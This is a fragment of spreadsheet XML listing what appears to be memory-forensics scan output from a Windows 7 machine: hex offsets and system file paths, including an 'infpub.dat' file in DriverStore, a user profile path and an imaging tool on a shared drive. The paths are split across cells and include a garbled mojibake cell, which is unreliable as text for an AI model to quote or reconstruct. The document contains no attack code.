    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\53b9bfe455e40dfddf33991467e1</t>
  </si>
  <si>
    <t>54b1\System.I</t>
  </si>
  <si>
    <t>O.Compressi</t>
  </si>
  <si>
    <t>on.ni.</t>
  </si>
  <si>
    <t>0xde62f328</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sisraid4.inf_x86_neutral_65ab84e9830f6f4b\sisraid</t>
  </si>
  <si>
    <t>4.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62f4a8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\pacer.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62f7f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.5_sql_en_30e6a6afa3284c6e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62fa18</t>
  </si>
  <si>
    <t>0xde62fcf0</t>
  </si>
  <si>
    <t>\Windows\System32\lpksetup.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde630408</t>
  </si>
  <si>
    <t>0xde6304c0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.P</t>
  </si>
  <si>
    <t>owerShell.Sec</t>
  </si>
  <si>
    <t>urity.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde630630</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\newdev.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6308e8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.MediaCenter.Mheg\6.1.0.0__31bf3856ad364e35\Microsoft.MediaC</t>
  </si>
  <si>
    <t>enter.Mheg.dl</t>
  </si>
  <si>
    <t>0xde6309a0</t>
  </si>
  <si>
    <t>0xde630a58</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6667.tmp\System.Web.DynamicData.Design.dl</t>
  </si>
  <si>
    <t>0xde630b10</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.SDHost\6.1.0.0__31bf3856ad364e35\Micros</t>
  </si>
  <si>
    <t>oft.Windows.D</t>
  </si>
  <si>
    <t>iagnosis.SD</t>
  </si>
  <si>
    <t>Host.d</t>
  </si>
  <si>
    <t>0xde630bc8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6EA0.tmp\Microsoft.Security.ApplicationId</t>
  </si>
  <si>
    <t>.Wizards.Auto</t>
  </si>
  <si>
    <t>maticRuleGe</t>
  </si>
  <si>
    <t>nerati</t>
  </si>
  <si>
    <t>onWizard.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde630c80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\napcrypt\e68c388e214d338c453a_x001B_[0K</t>
  </si>
  <si>
    <t>0xde631530</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0</t>
  </si>
  <si>
    <t>__31bf3856ad3</t>
  </si>
  <si>
    <t>64e35\Micro</t>
  </si>
  <si>
    <t>soft.S</t>
  </si>
  <si>
    <t>ecurity.ApplicationId.PolicyManagement.XmlHelper.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde631e00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_index_6f9ad1a80c4f7ad6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde632038</t>
  </si>
  <si>
    <t>0xde632350</t>
  </si>
  <si>
    <t>\Windows\System32\CompatTelRunner.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde632568</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_429cd25484dc6f94.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6328f8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress\6.1.0.0__31b</t>
  </si>
  <si>
    <t>\Microsoft.</t>
  </si>
  <si>
    <t>s.Diagnosis.Commands.WriteDiagProgress.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde632d80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pcwum.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6331c8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mcplayerinterop\4bf9dea4b9528b233bb7_x001B_[0K</t>
  </si>
  <si>
    <t>0xde633280</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\LoadMxf\d924c226c665e9c4d319_x001B_[0K</t>
  </si>
  <si>
    <t>0xde633338</t>
  </si>
  <si>
    <t>0xde6333f0</t>
  </si>
  <si>
    <t>0xde6334a8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\MCESidebarCtrl\6.1.0.0__31bf3856ad364e35\MCESidebarCtrl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde633560</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\mcglidhostobj\6.1.0.0__31bf3856ad364e35\mcglidhostobj.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde633618</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Conversion.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft</t>
  </si>
  <si>
    <t>.Build.Conver</t>
  </si>
  <si>
    <t>sion.v3.5.d</t>
  </si>
  <si>
    <t>0xde6336d0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\loadmxf\6.1.0.0__31bf3856ad364e35\loadmxf.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde633788</t>
  </si>
  <si>
    <t>0xde633840</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6C33.tmp\Microsoft.Security.ApplicationId</t>
  </si>
  <si>
    <t>ment.Cmdlet</t>
  </si>
  <si>
    <t>0xde6338f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC9A9.tmp\Microsoft.MediaCenter.iTv.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde6339b0</t>
  </si>
  <si>
    <t>0xde633a68</t>
  </si>
  <si>
    <t>0xde633ea8</t>
  </si>
  <si>
    <t>\Windows\System32\fdWCN.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde634038</t>
  </si>
  <si>
    <t>0xde6343c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\infpub.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde634758</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE728.tmp\Microsoft.ApplicationId.Framewor</t>
  </si>
  <si>
    <t>k.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde634810</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mcGlidHostObj\bcd694d0e2e05413c2e8_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6349c0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.MediaCenter.iTV.Media\6.1.0.0__31bf3856ad364e35\Microsoft.M</t>
  </si>
  <si>
    <t>ediaCenter.iT</t>
  </si>
  <si>
    <t>V.Media.dll</t>
  </si>
  <si>
    <t>0xde634ae8</t>
  </si>
  <si>
    <t>\Program Files\Windows NT\Accessories\wordpad.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde634ba0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF2F8.tmp\Microsoft.Build.Engine.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde634e10</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Net\3.5.0.0__b03f5f7f11d50a3a\System.Net.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde634ec8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEADF.tmp\Microsoft.Security.ApplicationId</t>
  </si>
  <si>
    <t>ment.XmlHel</t>
  </si>
  <si>
    <t>per.dl</t>
  </si>
  <si>
    <t>0xde634f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE8C2.tmp\Microsoft.ApplicationId.RuleWiza</t>
  </si>
  <si>
    <t>rd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde635038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\c78fb66aa1bd3257eab01b78e52b</t>
  </si>
  <si>
    <t>b66b\System.A</t>
  </si>
  <si>
    <t>ddIn.Contra</t>
  </si>
  <si>
    <t>ct.ni.</t>
  </si>
  <si>
    <t>dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde635288</t>
  </si>
  <si>
    <t>\Windows\System32\wucltux.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6359c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_device_9d2d754600160183.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde635f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_audio_9d2751b7c84ca0f1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde636038</t>
  </si>
  <si>
    <t>0xde636890</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wevtapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde636b90</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF4B.tmp\Microsoft.Build.Utilities.v3.5.d</t>
  </si>
  <si>
    <t>0xde636c48</t>
  </si>
  <si>
    <t>0xde636d00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\59d95f1110930ae7128602ed8539d165\</t>
  </si>
  <si>
    <t>System.Net.Ht</t>
  </si>
  <si>
    <t>tp.ni.dll.a</t>
  </si>
  <si>
    <t>ux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6372a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\scksp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde637558</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP493A.tmp\Microsoft.PowerShell.Commands.Ma</t>
  </si>
  <si>
    <t>nagement.dll_x001B_</t>
  </si>
  <si>
    <t>0xde637a18</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.ServiceModel.Web\3.5.0.0__31bf3856ad364e35\System.ServiceMod</t>
  </si>
  <si>
    <t>el.Web.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde6387f0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5199.tmp\Microsoft.PowerShell.ConsoleHost</t>
  </si>
  <si>
    <t>0xde6388a8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\</t>
  </si>
  <si>
    <t>Microsoft.Pow</t>
  </si>
  <si>
    <t>erShell.Com</t>
  </si>
  <si>
    <t>mands.</t>
  </si>
  <si>
    <t>Management.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde638960</t>
  </si>
  <si>
    <t>0xde638a18</t>
  </si>
  <si>
    <t>0xde638cd0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wldap32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde638f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7BED.tmp\Microsoft.WSMan.Runtime.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde639378</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde639478</t>
  </si>
  <si>
    <t>0xde639bb8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\AspNetMMCExt\9a917ff3020d0d0d0aa310e13e548eac\Asp</t>
  </si>
  <si>
    <t>NetMMCExt.ni.</t>
  </si>
  <si>
    <t>0xde639c70</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8147.tmp\UIAutomationClientsideProviders.</t>
  </si>
  <si>
    <t>0xde639d28</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\TaskScheduler\5ed5006a6f0865e24160_x001B_[0K</t>
  </si>
  <si>
    <t>0xde639e48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\4f604366eca1e94d8afe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde639f80</t>
  </si>
  <si>
    <t>мєђд‘Ёй‰ґн•ЇжЅ‹иљ°мџЈд€¶н‚ м‡је«ЂкЏ№лҐЎдњ°й™±бЉй†°д‹Ђоѕ•зјђжЁЁв«Јл„џм·¤гјѓз…·мњ„п° аЅ‰д”ќк’€м</t>
  </si>
  <si>
    <t>Ї—иЎѕиє­о°­пї</t>
  </si>
  <si>
    <t>Ѕе‡„м¤„п°Єи</t>
  </si>
  <si>
    <t>›¬йЄћй</t>
  </si>
  <si>
    <t>њ‘пїЅеЏЋољ€лџўкіЅмЉ•дЂЁої›йЂ„и‡џг¤іл‹™к•…ињЈк”†иҐ•л¬±вґ†а№ бЎЃбЅЅл”®м®—о¬‘н”•к”¤оѕ”бђ•п¶‰зЌ‹г‹єп±›гЏ‘п¤Ђж‰™Э°оЁІк¬®вµЂм©»в‡ќб­§й¤°бљЏвЋЄд†Ёлѓ‘б…®гљ›пїЅз‘Ђо†њж•жѓЃзЁћгЎ›иї€Т»з°¦б›”о•Ђж®¶к©¬п¶†лјЂ_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63a3f0</t>
  </si>
  <si>
    <t>0xde63ab08</t>
  </si>
  <si>
    <t>0xde63ad20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_speech_engines_sr_en-gb_3201b387cd317f4d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63b038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_scheduled_maintenance_6bb1b174b39bb442.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63b618</t>
  </si>
  <si>
    <t>0xde63ba80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sndvol.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63bc98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dps.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63c100</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_help_help_en-us_91e6e7979a9bf9c6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63c5b0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\4443cb37dc32a23fb76b8a487eb55271\Xa</t>
  </si>
  <si>
    <t>mlBuildTask.n</t>
  </si>
  <si>
    <t>i.dll.aux_x001B_[</t>
  </si>
  <si>
    <t>0xde63d038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdkj5.inf_x86_neutral_213bea3d7d51bba1\mdmtdkj</t>
  </si>
  <si>
    <t>0xde63d368</t>
  </si>
  <si>
    <t>0xde63d560</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP13.tmp\Microsoft.Build.Utilities.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63d618</t>
  </si>
  <si>
    <t>0xde63d798</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-ca_theme_8ade199269dd7453.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63d9d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\slc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63dc50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mstask.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63e360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_mui_0409_ecc96e0e9498d62e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63e628</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00a.inf_x86_neutral_d4494950448771ed\prnep00</t>
  </si>
  <si>
    <t>a.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63e748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_msdtc_trace_f33466dc5bf36670.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63eb30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_windowssearchengine_145004789</t>
  </si>
  <si>
    <t>b880a4a.cdf-m</t>
  </si>
  <si>
    <t>0xde63ef18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_usb_395978177bf6d5e1.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde63f130</t>
  </si>
  <si>
    <t>0xde63f740</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\napcrypt\6.1.0.0__31bf3856ad364e35\NAPCRYPT.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63f840</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wersvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde63fe60</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_filters_5fe1b967f204215a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde640110</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_clr_data_0864fda87da3c851.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde640420</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_bits_0409_a03dbeed63e8350a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6409b0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\atikmdag.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde640ca0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP3E76.tmp\System.Web.Extensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde640d58</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.GroupPolicy.Interop\2.0.0.0__31bf3856ad364e35\Microsoft.Gro</t>
  </si>
  <si>
    <t>upPolicy.Inte</t>
  </si>
  <si>
    <t>0xde640e10</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.GroupPolicy.Reporting\2.0.0.0__31bf3856ad364e35\Microsoft</t>
  </si>
  <si>
    <t>.GroupPolicy.</t>
  </si>
  <si>
    <t>Reporting.d</t>
  </si>
  <si>
    <t>0xde640ec8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP167.tmp\Microsoft.GroupPolicy.AdmTmplEdit</t>
  </si>
  <si>
    <t>or.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde640f80</t>
  </si>
  <si>
    <t>0xde641038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.IO.Log\da7a9f75a40287110d06_x001B_[0K</t>
  </si>
  <si>
    <t>0xde641480</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\MMCEx\e4f8bfc5e048d68be182_x001B_[0K</t>
  </si>
  <si>
    <t>0xde641588</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.AddIn.Contract\2.0.0.0__b03f5f7f11d50a3a\System.AddIn.Contra</t>
  </si>
  <si>
    <t>ct.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde641640</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP3513.tmp\System.ServiceModel.Web.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde641768</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\cc7141e43019bdf56845eff93e3b</t>
  </si>
  <si>
    <t>b150\System.W</t>
  </si>
  <si>
    <t>eb.DynamicD</t>
  </si>
  <si>
    <t>ata.De</t>
  </si>
  <si>
    <t>sign.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde641820</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft</t>
  </si>
  <si>
    <t>.Transactions</t>
  </si>
  <si>
    <t>.Bridge.Dtc</t>
  </si>
  <si>
    <t>0xde6418d8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.ApplicationId.RuleWizard\6.1.0.0__31bf3856ad364e35\Micros</t>
  </si>
  <si>
    <t>oft.Applicati</t>
  </si>
  <si>
    <t>onId.RuleWi</t>
  </si>
  <si>
    <t>zard.d</t>
  </si>
  <si>
    <t>0xde642038</t>
  </si>
  <si>
    <t>\Windows\System32\WWanAPI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6422e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MFC42.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6423a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_bg-bg_3ce955ba8d69a9ab.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde642960</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP4C33.tmp\Microsoft.PowerShell.Commands.Ut</t>
  </si>
  <si>
    <t>ility.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde642a18</t>
  </si>
  <si>
    <t>0xde643950</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\cximage.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde643b30</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.ApplicationId.Framework\6.1.0.0__31bf3856ad364e35\Microso</t>
  </si>
  <si>
    <t>ft.Applicatio</t>
  </si>
  <si>
    <t>nId.Framewo</t>
  </si>
  <si>
    <t>rk.dll</t>
  </si>
  <si>
    <t>0xde643be8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\SecurityAuditPoliciesSnapIn\6.1.0.0__31bf3856ad364e35\SecurityAudit</t>
  </si>
  <si>
    <t>PoliciesSnapI</t>
  </si>
  <si>
    <t>n.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde643ca0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde643d58</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fde.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde643e10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEC2A.tmp\Microsoft.Security.ApplicationId</t>
  </si>
  <si>
    <t>Engine</t>
  </si>
  <si>
    <t>Api.Interop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde643ec8</t>
  </si>
  <si>
    <t>0xde643f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde644108</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imetc10_dicts_31e93cd9cd8cc931.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde644558</t>
  </si>
  <si>
    <t>\Windows\System32\aitagent.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6446c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Magnify.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6448a8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msinfo32.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde645288</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_com_en-us_4019834316e68b9b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6456c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\AudioSrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde645a08</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sndvolsso.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde645ca0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2732059~31bf3856ad364e35~x86~~6.1.5.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde645f80</t>
  </si>
  <si>
    <t>\Windows\System32\dllhost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde646b70</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.Vsa\5154a1b718104baaafe1_x001B_[0K</t>
  </si>
  <si>
    <t>0xde646f80</t>
  </si>
  <si>
    <t>0xde647648</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wsock32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde647a80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\basecsp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde647c98</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7E.tmp\SecurityAuditPoliciesSnapIn.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde647e00</t>
  </si>
  <si>
    <t>0xde647f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Net\ab3b5a12e15e91f80a0882c44fe2c0d4\Syste</t>
  </si>
  <si>
    <t>m.Net.ni.dll_x001B_</t>
  </si>
  <si>
    <t>0xde648038</t>
  </si>
  <si>
    <t>0xde6481d8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.Bml\6.1.0.0__31bf3856ad364e35\Microsoft.Media</t>
  </si>
  <si>
    <t>Center.Bml.dl</t>
  </si>
  <si>
    <t>0xde648778</t>
  </si>
  <si>
    <t>\Windows\System32\sud.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde648958</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc007.inf_x86_neutral_cfebba21b1c02dd7\prnrc00</t>
  </si>
  <si>
    <t>0xde648b58</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\recdisc.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde648ca8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\rawsilo.inf_x86_neutral_a625e7b9dcdf1780\rawsilo.</t>
  </si>
  <si>
    <t>0xde6494c8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6495e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\43a2a30376d49f671b4_x001B_[0K</t>
  </si>
  <si>
    <t>0xde649948</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP78DF.tmp\Microsoft.Windows.Diagnosis.Comm</t>
  </si>
  <si>
    <t>ands.WriteDia</t>
  </si>
  <si>
    <t>gProgress.d</t>
  </si>
  <si>
    <t>0xde649af0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\httpapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64a570</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_remotepackages_remotedesktops_873149a9e18f9d12.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64abc8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\57a8c1ebae660c55301170f1c401</t>
  </si>
  <si>
    <t>7b80\System.I</t>
  </si>
  <si>
    <t>dentityMode</t>
  </si>
  <si>
    <t>l.Sele</t>
  </si>
  <si>
    <t>ctors.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64ad50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dwm.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64b530</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wshtcpip.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde64b968</t>
  </si>
  <si>
